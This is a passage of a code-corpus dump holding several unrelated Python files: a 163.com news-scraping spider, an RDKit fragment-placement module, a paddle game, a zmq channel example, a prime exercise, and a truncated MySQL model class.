json.loads(response.text)\n if len(jsonbd['推荐']) == 0: return\n for item in jsonbd['推荐']:\n if 'id' not in item.keys() or len(item['id']) == 0: continue\n id = item['id'] if 'id' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n title = item['title'] if 'title' in item.keys() else None\n url = 'http://c.m.163.com/nc/article/preload/{}/full.html'.format(id)\n yield Request(url=url, callback=self.content2_parse, encoding='utf-8', headers=self.headers,meta={'date':date,'id':id,'source':source,'title':title})\n\n def content_parse(self, response):\n date = response.meta['date']\n if date == None or len(date) == 0: return\n try:\n if helper.compare_time(date, self.limittime) < 0: return\n except:\n return\n\n pipleitem = CctvOpinionmonitor2Item()\n\n pipleitem['date'] = helper.formatTime(date)\n pipleitem['id'] = response.meta['id']\n pipleitem['url'] = response.url\n pipleitem['title'] = response.css('title::text').extract_first()\n pipleitem['source'] = response.meta['source']\n pipleitem['editor'] = None\n # pipleitem['content'] = helper.list2str(response.xpath('string(//div[@class=\"QuestionHeader-detail\"])').extract())\n pipleitem['content'] = helper.list2str(response.xpath('string(//div[@id=\"endText\"])').extract()).replace('\\t','')\n pipleitem['image_urls'] = helper.list2str(response.css('#endText img::attr(src)').extract())\n pipleitem['video_urls'] = helper.list2str(response.css('#endText source::attr(src)').extract())\n pipleitem['share'] = None\n pipleitem['like'] = response.meta['like']\n pipleitem['dislike'] = None\n pipleitem['views'] = None\n pipleitem['comment'] = response.meta['replyCount']\n pipleitem['crawl_time'] = helper.get_localtimestamp()\n\n return pipleitem\n\n def content2_parse(self, response):\n date = response.meta['date']\n if date == None or len(date) == 0: return\n try:\n if helper.compare_time(date, self.limittime) < 0: return\n except:\n return\n\n jsonbd = json.loads(response.text)\n if len(jsonbd[response.meta['id']]) == 0: return\n questions_body = jsonbd[response.meta['id']]\n\n pipleitem = CctvOpinionmonitor2Item()\n\n pipleitem['date'] = helper.formatTime(date)\n pipleitem['id'] = response.meta['id']\n pipleitem['url'] = response.url\n pipleitem['title'] = response.meta['title']\n pipleitem['source'] = response.meta['source']\n pipleitem['editor'] = None\n # pipleitem['content'] = helper.list2str(response.xpath('string(//div[@class=\"QuestionHeader-detail\"])').extract())\n pipleitem['content'] = helper.list2str(re.findall('>(.*?)<', questions_body['body']))\n # pipleitem['image_urls'] = helper.list2str(re.findall('<img.*?src=\"(.*?)\"',questions_body['content']))\n imglist = []\n for i in questions_body['img']:\n imglist.append(i['src'])\n pipleitem['image_urls'] = helper.list2str(imglist)\n pipleitem['video_urls'] = None\n pipleitem['share'] = None\n pipleitem['like'] = questions_body['threadVote'] if 'threadVote' in questions_body.keys() else None\n pipleitem['dislike'] = questions_body['threadAgainst'] if 'threadAgainst' in questions_body.keys() else None\n # pipleitem['views'] = response.xpath('//strong[@class=\"NumberBoard-itemValue\"]/@title').extract_first()\n pipleitem['views'] = None\n # pipleitem['comment'] = response.xpath('//meta[@itemprop=\"commentCount\"]/@content').extract_first()\n pipleitem['comment'] = questions_body['replyCount'] if 'replyCount' in questions_body.keys() else None\n pipleitem['crawl_time'] = helper.get_localtimestamp()\n\n return pipleitem\n","sub_path":"cctv_OpinionMonitor2/cctv_OpinionMonitor2/spiders/a163_com.py","file_name":"a163_com.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"257758937","text":"########################################################################################################################\n__doc__ = \\\n \"\"\"\nThis is inherited by MonsterPlace\n \"\"\"\n\n########################################################################################################################\n\nfrom rdkit.Chem import rdmolops\n\nimport itertools\nimport json\nfrom collections import Counter\nfrom collections import defaultdict\nfrom typing import Optional, Dict, List, Tuple\nfrom warnings import warn\n\nimport numpy as np\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import rdFMCS, rdMolAlign, rdmolops\nfrom rdkit.Chem import rdmolops\nfrom rdkit.Geometry.rdGeometry import Point3D\n\nfrom ._communal import _MonsterCommunal\nfrom ._merge import _MonsterMerge\nfrom .unmerge_mapper import Unmerge\n\n\nclass _MonsterBlend(_MonsterMerge):\n # placement dependent methdos\n\n # @classmethod #why was this a classmethod\n def full_blending(self) -> None:\n \"\"\"\n a single scaffold is made (except for ``.unmatched``)\n \"\"\"\n self.mol_options = [self.simply_merge_hits()]\n scaffold = self.posthoc_refine(self.mol_options[0])\n chimera = self.make_chimera(scaffold)\n self.keep_copy(scaffold, 'scaffold')\n self.keep_copy(chimera, 'chimera')\n self.positioned_mol = self.place_from_map(target_mol=self.initial_mol,\n template_mol=chimera,\n atom_map=None)\n\n def partial_blending(self) -> None:\n \"\"\"\n multiple possible scaffolds for placement and best is chosen\n \"\"\"\n self.mol_options = self.partially_blend_hits() # merger of hits\n unrefined_scaffold, mode_index = self.pick_best()\n used = unrefined_scaffold.GetProp('_Name').split('-')\n self.unmatched = [h.GetProp('_Name') for h in self.hits if h.GetProp('_Name') not in used]\n scaffold = self.posthoc_refine(unrefined_scaffold)\n chimera = self.make_chimera(scaffold, mode_index)\n self.keep_copy(scaffold, 'scaffold')\n self.keep_copy(chimera, 'chimera')\n self.positioned_mol = self.place_from_map(target_mol=self.positioned_mol,\n template_mol=chimera,\n atom_map=None)\n\n def no_blending(self, broad=False) -> None:\n \"\"\"\n no merging is done. The hits are mapped individually. Not great for small fragments.\n \"\"\"\n maps = {}\n for template in self.hits:\n if broad:\n pair_atom_maps, _ = self.get_mcs_mappings(self.initial_mol, template)\n maps[template.GetProp('_Name')] = pair_atom_maps\n else:\n pair_atom_maps_t = self._get_atom_maps(self.initial_mol, template,\n atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=True)\n pair_atom_maps = [dict(p) for p in pair_atom_maps_t]\n maps[template.GetProp('_Name')] = pair_atom_maps\n um = Unmerge(followup=self.initial_mol,\n mols=self.hits,\n maps=maps,\n no_discard=self.throw_on_discard)\n self.keep_copy(um.combined, 'scaffold')\n self.keep_copy(um.combined_bonded, 'chimera')\n self.unmatched = [m.GetProp('_Name') for m in um.disregarded]\n if self.throw_on_discard and len(self.unmatched):\n raise ConnectionError(f'{self.unmatched} was rejected.')\n self.journal.debug(f'followup to scaffold {um.combined_map}')\n # ------------------ places the atoms with known mapping ------------------\n placed = self.place_from_map(target_mol=self.initial_mol,\n template_mol=um.combined_bonded,\n atom_map=um.combined_map)\n alts = zip(um.combined_bonded_alternatives, um.combined_map_alternatives)\n placed_options = [self.place_from_map(target_mol=self.initial_mol,\n template_mol=mol,\n atom_map=mappa) for mol, mappa in alts]\n # ------------------ Averages the overlapping atoms ------------------\n self.positioned_mol = self.posthoc_refine(placed)\n self.mol_options = [self.posthoc_refine(mol) for mol in placed_options]\n\n # ================= Blend hits ===================================================================================\n\n def partially_blend_hits(self, hits: Optional[List[Chem.Mol]] = None) -> List[Chem.Mol]:\n \"\"\"\n This is the partial merge algorithm, wherein the hits are attempted to be combined.\n If the combination is bad. It will not be combined.\n Returning a list of possible options.\n These will have the atoms changed too.\n\n :param hits:\n :param distance:\n :return:\n \"\"\"\n\n if hits is None:\n hits = sorted(self.hits, key=lambda h: h.GetNumAtoms(), reverse=True)\n for hi, hit in enumerate(hits):\n # fallback naming.\n if not hit.HasProp('_Name') or hit.GetProp('_Name').strip() == '':\n hit.SetProp('_Name', f'hit{hi}')\n\n ## a dodgy hit is a hit with inconsistent mapping bwteen three.\n def get_dodgies(skippers):\n dodgy = []\n for hit0, hit1, hit2 in itertools.combinations(hits, 3):\n hn0 = hit0.GetProp('_Name')\n hn1 = hit1.GetProp('_Name')\n hn2 = hit2.GetProp('_Name')\n if any([hit in skippers for hit in (hn0, hn1, hn2)]):\n continue\n for a, b in inter_mapping[(hn0, hn1)].items():\n if a in inter_mapping[(hn0, hn2)] and b in inter_mapping[(hn1, hn2)]:\n if inter_mapping[(hn0, hn2)][a] != inter_mapping[(hn1, hn2)][b]:\n # TODO: THIS IS A BAD OPTION:\n # if all([m.GetAtomWithIdx(i).IsInRing() for m, i in ((hit0, a),\n # (hit1, b),\n # (hit2, inter_mapping[(hn0, hn2)][a]),\n # (hit2, inter_mapping[(hn1, hn2)][b]))]):\n # pass\n # else:\n dodgy.extend((hn0, hn1, hn2))\n d = Counter(dodgy).most_common()\n if dodgy:\n return get_dodgies(skippers=skippers + [d[0][0]])\n else:\n return skippers\n\n inter_mapping = {}\n for h1, h2 in itertools.combinations(hits, 2):\n inter_mapping[(h1.GetProp('_Name'), h2.GetProp('_Name'))] = self.get_positional_mapping(h1, h2)\n dodgy_names = get_dodgies([])\n self.warning(f'These combiend badly: {dodgy_names}')\n dodgies = [hit for hit in hits if hit.GetProp('_Name') in dodgy_names]\n mergituri = [hit for hit in hits if hit.GetProp('_Name') not in dodgy_names]\n merged = self.simply_merge_hits(mergituri)\n dodgies += [hit for hit in hits if hit.GetProp('_Name') in self.unmatched]\n self.unmatched = []\n combined_dodgies = []\n for h1, h2 in itertools.combinations(dodgies, 2):\n h_alt = Chem.Mol(h1)\n try:\n combined_dodgies.append(self.merge_pair(h_alt, h2))\n except ConnectionError:\n pass\n combinations = [merged] + dodgies + combined_dodgies\n # propagate alternatives\n while self.propagate_alternatives(combinations) != 0:\n pass\n return combinations\n\n def propagate_alternatives(self, fewer):\n pt = Chem.GetPeriodicTable()\n new = 0\n for template in list(fewer):\n for i, atom in enumerate(template.GetAtoms()):\n if atom.HasProp('_AltSymbol'):\n alt = Chem.Mol(template)\n aa = alt.GetAtomWithIdx(i)\n aa.SetAtomicNum(pt.GetAtomicNumber(atom.GetProp('_AltSymbol')))\n aa.ClearProp('_AltSymbol')\n atom.ClearProp('_AltSymbol')\n fewer.append(alt)\n new += 1\n return new\n\n def pick_best(self) -> Tuple[Chem.Mol, int]:\n \"\"\"\n Method for partial merging for placement\n\n :return: unrefined_scaffold, mode_index\n \"\"\"\n if len(self.mol_options) == 1:\n return self.mol_options[0], 0\n elif len(self.mol_options) == 0:\n raise ValueError('No scaffolds made?!')\n else:\n mapx = {} #: dictionary of key mol name and value tuple of maps and mode\n\n def template_sorter(t: List[Chem.Mol]) -> float:\n # key for sorting. requires outer scope ``maps``.\n n_atoms = len(mapx[t.GetProp('_Name')][0])\n mode = mapx[t.GetProp('_Name')][1]\n mode_i = self.matching_modes.index(mode)\n return - n_atoms - mode_i / 10\n\n ## get data\n # presort as this is expensive.\n for template in self.mol_options:\n # _get_atom_maps returns a list of alternative mappings which are lists of template to initail mol\n atom_maps = self._get_atom_maps(template, self.initial_mol,\n atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=False)\n mapx[template.GetProp('_Name')] = (atom_maps, self.matching_modes[-1])\n # search properly only top 3.\n self.mol_options = sorted(self.mol_options, key=template_sorter)\n for template in self.mol_options[:3]:\n atom_map, mode = self.get_mcs_mapping(template, self.initial_mol)\n # get_mcs_mapping returns a dict going from template index to initial.\n mapx[template.GetProp('_Name')] = (atom_map, mode)\n self.journal.debug(f\"With {template.GetProp('_Name')}, \"+\\\n \"{len(atom_map)} atoms map using mode {self.matching_modes.index(mode)}\")\n ## pick best template\n self.mol_options = sorted(self.mol_options, key=template_sorter)\n ## Check if missing atoms can be explained by a different one with no overlap\n best = self.mol_options[0]\n ## Fuse overlaps\n # best_map = maps[best.GetProp('_Name')][0]\n # full = set(range(self.initial_mol.GetNumAtoms()))\n # present = set(best_map.values())\n # missing = full - present\n # for other in self.mol_options:\n # other_map = maps[other.GetProp('_Name')][0]\n # found = set(other_map.values())\n # if len(found) > 6 and len(present & found) == 0: # more than just a ring and no overlap\n # fusion = self._fuse(best, other, best_map, other_map)\n return best, self.matching_modes.index(mapx[best.GetProp('_Name')][1])\n\n # def _fuse(self, mol_A: Chem.Mol, mol_B: Chem.Mol, map_A: Dict[int, int], map_B: Dict[int, int]) -> Chem.Mol:\n # \"\"\"\n # Merge two compounds... but that are unlinked, using the followup as a guide.\n # Conceptually different but overlapping is join_neighboring_mols\n #\n # :param mol_A:\n # :param mol_B:\n # :param map_A:\n # :param map_B:\n # :return:\n # \"\"\"\n # # No longer needed.\n # fusion = Chem.RwMol(Chem.CombineMols(mol_A, mol_B))\n # t = mol_A.GetNumAtoms()\n # new_map_B = {k+t: v for k, v in map_B.items()}\n # full = set(range(self.initial_mol.GetNumAtoms()))\n # present_A = set(map_A.values())\n # present_B = set(map_B.values())\n #\n # def find_route(n):\n # if n in present_A:\n # return None\n # elif n in present_B:\n # return n\n # else:\n # path_raw = {m: find_route(m) for m in self.initial_mol.GetAtomWithIdx(n).GetNeighbors()}\n # path = {i: path_raw[i] for i in path_raw if path_raw[i] is not None}\n # if len(path) == 0:\n # return None\n # else:\n # return {n: path}\n\n # ================= Chimera ========================================================================================\n\n def make_chimera(self, template: Chem.Mol, min_mode_index=0) -> Chem.Mol:\n \"\"\"\n This is to avoid extreme corner corner cases.\n E.g. here the MCS is ringMatchesRingOnly=True and AtomCompare.CompareAny,\n while for the positioning this is not the case.\n\n :return:\n \"\"\"\n # get the matches\n atom_map, mode = self.get_mcs_mapping(template, self.initial_mol, min_mode_index=min_mode_index)\n follow = {**{k: str(v) for k, v in mode.items()}, 'N_atoms': len(atom_map)}\n self.journal.debug(f\"scaffold-followup: {follow}\")\n # make the scaffold more like the followup to avoid weird matches.\n chimera = Chem.RWMol(template)\n for scaff_ai, follow_ai in atom_map.items():\n if template.GetAtomWithIdx(scaff_ai).GetSymbol() != self.initial_mol.GetAtomWithIdx(\n follow_ai).GetSymbol():\n v = {'F': 1, 'Br': 1, 'Cl': 1, 'H': 1, 'B': 3, 'C': 4, 'N': 3, 'O': 2, 'S': 2, 'Se': 2, 'P': 6}\n wanted = self.initial_mol.GetAtomWithIdx(follow_ai)\n if wanted.GetSymbol() == '*': # all good then!\n continue\n owned = template.GetAtomWithIdx(scaff_ai)\n diff_valance = owned.GetExplicitValence() - v[wanted.GetSymbol()]\n if wanted.GetSymbol() in ('F', 'Br', 'Cl', 'C', 'H') and diff_valance > 0:\n continue # cannot change this.\n elif owned.GetExplicitValence() > 4 and wanted.GetSymbol() not in ('P',):\n continue\n else:\n newatom = Chem.Atom(wanted)\n stdev = chimera.GetAtomWithIdx(scaff_ai).GetDoubleProp('_Stdev')\n newatom.SetDoubleProp('_Stdev', stdev)\n origin = chimera.GetAtomWithIdx(scaff_ai).GetProp('_Origin')\n newatom.SetProp('_Origin', origin)\n chimera.ReplaceAtom(scaff_ai, newatom)\n if diff_valance > 0:\n chimera.GetAtomWithIdx(scaff_ai).SetFormalCharge(diff_valance)\n try:\n chimera.UpdatePropertyCache()\n except Chem.AtomValenceException as err:\n warn('Valance issue' + str(err))\n return chimera\n\n def place_from_map(self, target_mol: Chem.Mol, template_mol: Chem.Mol, atom_map: Optional[Dict] = None) -> Chem.Mol:\n \"\"\"\n This method places the atoms with known mapping\n and places the 'uniques' (novel) via an aligned mol (the 'sextant')\n This sextant business is a workaround for the fact that only minimised molecules can use the partial\n embedding function of RDKit.\n\n :param target_mol: target mol\n :param template_mol: the template/scaffold to place the mol\n :param atom_map: something that get_mcs_mapping would return.\n :return:\n \"\"\"\n # Note none of this malarkey: AllChem.MMFFOptimizeMolecule(ref)\n # prealignment\n if target_mol is None:\n target_mol = self.initial_mol\n sextant = Chem.Mol(target_mol)\n Chem.SanitizeMol(sextant)\n AllChem.EmbedMolecule(sextant)\n AllChem.MMFFOptimizeMolecule(sextant)\n ######################################################\n # mapping retrieval and sextant alignment\n # variables: atom_map sextant -> uniques\n if atom_map is None:\n atom_map, mode = self.get_mcs_mapping(target_mol, template_mol)\n msg = {**{k: str(v) for k, v in mode.items()}, 'N_atoms': len(atom_map)}\n self.journal.debug(f\"followup-chimera' = {msg}\")\n rdMolAlign.AlignMol(sextant, template_mol, atomMap=list(atom_map.items()), maxIters=500)\n # place atoms that have a known location\n putty = Chem.Mol(sextant)\n pconf = putty.GetConformer()\n chimera_conf = template_mol.GetConformer()\n uniques = set() # unique atoms in followup\n for i in range(putty.GetNumAtoms()):\n p_atom = putty.GetAtomWithIdx(i)\n p_atom.SetDoubleProp('_Stdev', 0.)\n p_atom.SetProp('_Origin', 'none')\n if i in atom_map:\n ci = atom_map[i]\n c_atom = template_mol.GetAtomWithIdx(ci)\n if c_atom.HasProp('_Stdev'):\n stdev = c_atom.GetDoubleProp('_Stdev')\n origin = c_atom.GetProp('_Origin')\n p_atom.SetDoubleProp('_Stdev', stdev)\n p_atom.SetProp('_Origin', origin)\n pconf.SetAtomPosition(i, chimera_conf.GetAtomPosition(ci))\n else:\n uniques.add(i)\n ######################################################\n # I be using a sextant for dead reckoning!\n # variables: sextant unique team\n categories = self._categorise(sextant, uniques)\n done_already = [] # multi-attachment issue.\n for unique_idx in categories['pairs']: # attachment unique indices\n # check the index was not done already (by virtue of a second attachment)\n if unique_idx in done_already:\n continue\n # get other attachments if any.\n team = self._recruit_team(target_mol, unique_idx, categories['uniques'])\n other_attachments = (team & set(categories['pairs'].keys())) - {unique_idx}\n sights = set() # atoms to align against\n for att_idx in [unique_idx] + list(other_attachments):\n for pd in categories['pairs'][att_idx]:\n first_sight = pd['idx']\n sights.add((first_sight, first_sight))\n neighs = [i.GetIdx() for i in sextant.GetAtomWithIdx(first_sight).GetNeighbors() if\n i.GetIdx() not in uniques]\n for n in neighs:\n sights.add((n, n))\n if self.attachment and list(categories['dummies']) and list(categories['dummies'])[0] in team:\n r = list(categories['dummies'])[0]\n pconf.SetAtomPosition(r, self.attachment.GetConformer().GetAtomPosition(0))\n sights.add((r, r))\n rdMolAlign.AlignMol(sextant, putty, atomMap=list(sights), maxIters=500)\n sconf = sextant.GetConformer()\n self.journal.debug(f'alignment atoms for {unique_idx} ({team}): {sights}')\n # self.draw_nicely(sextant, highlightAtoms=[a for a, b in sights])\n # copy position over\n for atom_idx in team:\n pconf.SetAtomPosition(atom_idx, sconf.GetAtomPosition(atom_idx))\n # the ring problem does not apply here but would result in rejiggling atoms.\n\n for other in other_attachments:\n done_already.append(other)\n # complete\n AllChem.SanitizeMol(putty)\n return putty # positioned_mol\n\n\n\n def transfer_ring_data(self, donor: Chem.Atom, acceptor: Chem.Atom):\n \"\"\"\n Transfer the info if a ringcore atom.\n\n :param donor:\n :param acceptor:\n :return:\n \"\"\"\n # if donor.GetIntProp('_ori_i') == -1:\n # data = donor\n pass\n\n # ========= Other ==================================================================================================\n\n def posthoc_refine(self, scaffold, indices: Optional[List[int]] = None) -> Chem.Mol:\n \"\"\"\n Averages the overlapping atoms.\n\n :param scaffold:\n :return:\n \"\"\"\n if indices is None:\n indices = list(range(scaffold.GetNumAtoms()))\n refined = Chem.RWMol(scaffold)\n refconf = refined.GetConformer()\n positions = defaultdict(list) # coordinates\n equivalence = defaultdict(list) # atom indices of hits.\n for h in self.hits:\n if h.GetProp('_Name') in self.unmatched:\n continue\n hc = h.GetConformer()\n for k, v in self.get_positional_mapping(scaffold, h).items():\n positions[k].append([hc.GetAtomPosition(v).x, hc.GetAtomPosition(v).y, hc.GetAtomPosition(v).z])\n equivalence[k].append(f'{h.GetProp(\"_Name\")}.{v}')\n for i in range(scaffold.GetNumAtoms()):\n if i not in indices:\n continue\n elif len(positions[i]) == 0:\n refined.GetAtomWithIdx(i).SetDoubleProp('_Stdev', 0.)\n refined.GetAtomWithIdx(i).SetDoubleProp('_Max', 0.)\n refined.GetAtomWithIdx(i).SetProp('_Origin', 'none')\n # warn(f'Atom {i} {scaffold.GetAtomWithIdx(i).GetSymbol}/{refined.GetAtomWithIdx(i).GetSymbol} '+ \\\n # 'in scaffold that has no positions.')\n else:\n p = np.mean(np.array(positions[i]), axis=0).astype(float)\n # sd = np.mean(np.std(np.array(positions[i]), axis=0)).astype(float)\n ds = [np.linalg.norm(p - pi) for pi in positions[i]]\n sd = np.std(ds)\n md = np.max(ds)\n refined.GetAtomWithIdx(i).SetProp('_Origin', json.dumps(equivalence[i]))\n refined.GetAtomWithIdx(i).SetDoubleProp('_Stdev', sd)\n refined.GetAtomWithIdx(i).SetDoubleProp('_Max', md)\n if self.average_position:\n refconf.SetAtomPosition(i, Point3D(p[0], p[1], p[2]))\n Chem.SanitizeMol(refined,\n sanitizeOps=Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS +\n Chem.rdmolops.SanitizeFlags.SANITIZE_SETAROMATICITY,\n catchErrors=True)\n return refined\n\n def get_mcs_mappings(self, molA, molB, min_mode_index: int = 0) -> Tuple[List[Dict[int, int]], dict]:\n \"\"\"\n This is a weird method. It does a strict MCS match.\n And then it uses laxer searches and finds the case where a lax search includes the strict search.\n\n :param molA: query molecule\n :param molB: target/ref molecule\n :param min_mode_index: the lowest index to try (opt. speed reasons)\n :return: mappings and mode\n \"\"\"\n strict_settings = dict(atomCompare=rdFMCS.AtomCompare.CompareElements,\n bondCompare=rdFMCS.BondCompare.CompareOrder,\n ringMatchesRingOnly=True,\n ringCompare=rdFMCS.RingCompare.PermissiveRingFusion,\n matchChiralTag=True)\n strict = self._get_atom_maps(molA, molB, **strict_settings)\n for i, mode in enumerate(self.matching_modes):\n if i < min_mode_index:\n continue\n lax = self._get_atom_maps(molA, molB, **mode)\n # remove the lax matches that disobey\n neolax = [l for l in lax if any([len(set(s) - set(l)) == 0 for s in strict])]\n if len(neolax) == 0:\n continue\n else:\n return [dict(n) for n in neolax], mode\n else:\n # Then the strict will have to do.\n return [dict(n) for n in strict], strict_settings # tuple to dict\n # raise ValueError('This is chemically impossible: nothing matches in the MCS step ' +\\\n # f'({len(self.matching_modes)} modes tried')\n\n def get_mcs_mapping(self, molA, molB, min_mode_index: int = 0) -> Tuple[Dict[int, int], dict]:\n \"\"\"\n This is a weird method. It does a strict MCS match.\n And then it uses laxer searches and finds the case where a lax search includes the strict search.\n\n :param molA: query molecule\n :param molB: target/ref molecule\n :param min_mode_index: the lowest index to try (opt. speed reasons)\n :return: mapping and mode\n \"\"\"\n ms, mode = self.get_mcs_mappings(molA, molB, min_mode_index)\n return ms[0], mode\n\n def _get_atom_maps(self, molA, molB, **mode) -> List[List[Tuple[int, int]]]:\n mcs = rdFMCS.FindMCS([molA, molB], **mode)\n common = Chem.MolFromSmarts(mcs.smartsString)\n matches = []\n # prevent a dummy to match a non-dummy, which can happen when the mode is super lax.\n is_dummy = lambda mol, at: mol.GetAtomWithIdx(at).GetSymbol() == '*'\n all_bar_dummy = lambda Aat, Bat: (is_dummy(molA, Aat) and is_dummy(molB, Bat)) or not (\n is_dummy(molA, Aat) or is_dummy(molB, Bat))\n for molA_match in molA.GetSubstructMatches(common, uniquify=False):\n for molB_match in molB.GetSubstructMatches(common, uniquify=False):\n matches.append([(molA_at, molB_at) for molA_at, molB_at in zip(molA_match, molB_match) if\n all_bar_dummy(molA_at, molB_at)])\n # you can map two toluenes 4 ways, but two are repeats.\n matches = set([tuple(sorted(m, key=lambda i: i[0])) for m in matches])\n return matches\n\n def _get_atom_map(self, molA, molB, **mode) -> List[Tuple[int, int]]:\n return self._get_atom_maps(molA, molB, **mode)[0]\n\n def pretweak(self) -> None:\n \"\"\"\n What if the fragments were prealigned slightly? Really bad things.\n\n :return:\n \"\"\"\n warn('This method is unreliable. Do not use it')\n ref = self.hits[0]\n for target in self.hits[1:]:\n A2B = list(self.get_positional_mapping(target, ref, 0.5).items())\n if A2B:\n rdMolAlign.AlignMol(target, ref, atomMap=A2B, maxIters=500)\n else:\n warn(f'No overlap? {A2B}')\n\n @property\n def matched(self) -> List[str]:\n \"\"\"\n This is the counter to unmatched.\n It's dynamic as you never know...\n\n :return:\n \"\"\"\n return [h.GetProp('_Name') for h in self.hits if\n h.GetProp('_Name') not in self.unmatched]\n","sub_path":"fragmenstein/monster/_blend_place.py","file_name":"_blend_place.py","file_ext":"py","file_size_in_byte":27145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"419027468","text":"#RonaldRusso\nimport sys\nfrom graphics import *\nfrom random import randint\nimport time\n\nwin = GraphWin(\"My Game\", 800,500)\nwin.setBackground(\"light green\")\ngameover = False\n\npaddle = Rectangle(Point(350, 475), Point(450,490))\npaddle.setFill(\"red\")\npaddle.draw(win)\n\nrandx = randint (0,800)\nballPts = Point(randx,0)\nball = Circle(ballPts,15)\nball.draw(win)\nbally = ballPts.getY()\nballx = ballPts.getX()\n\nmessage = Text(Point(50,25), \"Score:\")\nmessage.setSize(25)\nmessage.draw(win)\n\nmessage2 = Text(Point(120,25), 0)\nmessage2.setSize(25)\nmessage2.draw(win)\nscore = 0\n\nwhile bally < 500:\n while gameover == False:\n\n movement = win.checkKey()\n if movement == \"a\":\n paddle.move(-25,0)\n elif movement == \"d\":\n paddle.move(25,0)\n\n bally = bally + 20\n ball.move(0,20)\n time.sleep(.1)\n paddlePt = paddle.getP1()\n paddlex = paddlePt.getX()\n if ballx >= paddlex and ballx <= paddlex + 100 and bally > 495:\n message2.undraw()\n score = score + 1\n message2 = Text(Point(120,25),score)\n message2.setSize(25)\n message2.draw(win)\n if score == 15:\n gameover = True\n win.close()\n exit()\n\n if ballx <= paddlex and bally > 495 or ballx >= paddlex + 100 and bally > 495:\n message2.undraw()\n score = score - 1\n message2 = Text(Point(120,25),score)\n message2.setSize(25)\n message2.draw(win)\n\n if score == -3:\n gameover = True\n win.close()\n exit()\n\n if bally >= 500:\n ball.undraw()\n randx = randint(10,800)\n ballPts = Point(randx,0)\n ball = Circle(ballPts,15)\n ball.draw(win)\n ballx = ballPts.getX()\n bally = 0\n","sub_path":"BallAndPaddle.py","file_name":"BallAndPaddle.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"489056072","text":"\n\nfrom xai.brain.wordbase.nouns._abode import _ABODE\n\n#calss header\nclass _ABODES(_ABODE, ):\n\tdef __init__(self,): \n\t\t_ABODE.__init__(self)\n\t\tself.name = \"ABODES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"abode\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_abodes.py","file_name":"_abodes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"40010904","text":"# -*- coding:utf-8 -*-\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nimport time\nimport gevent\nfrom gevent import monkey\n\nfrom corgi.zeromq import zmq\nfrom corgi.channel import Channel, RecvPoller\nfrom corgi.random import random_str\n\nmonkey.patch_all()\ncount = 10\nchannel = Channel()\nfor x in range(count):\n channel.send(random_str())\n\nfor x in range(count):\n print('index: {}\\tmessage: {}'.format(x, channel.recv()))\n\n\ndef send(chan):\n chan.send(random_str())\n\n\ncount = 10\nfor x in range(count):\n gevent.spawn(send, channel)\n\n\ndef poll():\n msg_count = 0\n poller = RecvPoller([channel])\n while poller.is_active:\n for c, s, msg in poller.poll(timeout=1.0):\n if c is channel and s is zmq.POLLIN:\n print('count: {}\\tmsg :{}'.format(msg_count, msg))\n msg_count += 1\n if c is None:\n print('timeout', time.time())\n # if msg_count == 9:\n # poller.quit()\n\n\npoll_deamon = gevent.spawn(poll)\ngevent.joinall([poll_deamon])\n\n\n# output:\n# (py3) ➜ corgi git:(master) ✗ python examples/channel/channel.py\n# index: 0\tmessage: hcamcrjc\n# index: 1\tmessage: vdipwwnv\n# index: 2\tmessage: xealzdij\n# index: 3\tmessage: xylkoozm\n# index: 4\tmessage: fqlctmms\n# index: 5\tmessage: ixqcidrd\n# index: 6\tmessage: vzsjldts\n# index: 7\tmessage: gqcvtrqt\n# index: 8\tmessage: hflpiobm\n# index: 9\tmessage: woypttsq\n# count: 0\tmsg :ppnrdkhv\n# count: 1\tmsg :xzxuakmo\n# count: 2\tmsg :ertylxtw\n# count: 3\tmsg :nueqszlb\n# count: 4\tmsg :czkthrac\n# count: 5\tmsg :cavgixoj\n# count: 6\tmsg :hvzgtjix\n# count: 7\tmsg :duygrfol\n# count: 8\tmsg :udmddpno\n# count: 9\tmsg :zulmgbtl","sub_path":"examples/channel/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"58161655","text":"def premier(i):\r\n s=0\r\n n=int(i**(1/2))\r\n for j in range (2,n+1):\r\n if i%j==0: \r\n return False\r\n else : s+=1\r\n if s==(n-1):\r\n return True\r\n\r\ndef exo7(n):\r\n i=2\r\n s=0\r\n while s<n:\r\n if premier(i):\r\n s+=1\r\n i+=1\r\n else:\r\n i+=1\r\n return i-1 \r\n\r\n\r\nassert(exo7(6)==13)\r\nprint(exo7(10001))\r\n\r\n\r\n\r\n","sub_path":"exo7.py","file_name":"exo7.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"329089410","text":"#! /usr/bin/env python3\n\nfrom mysql.connector import errors, errorcode\nfrom functools import partialmethod\nfrom io import StringIO\n\nclass ModelBase(object):\n def __init__(self, sub_name:str, **row_dict : dict):\n if self.check_row_schema(row_dict):\n for k,v in row_dict.items():\n self._row_dict = row_dict\n if k not in self.get_readonly_attr_names():\n setattr(\n self, k, \n property(\n partialmethod(self.__get_data, key=k),\n partialmethod(self.__set_data, key=k)\n )\n )\n else:\n 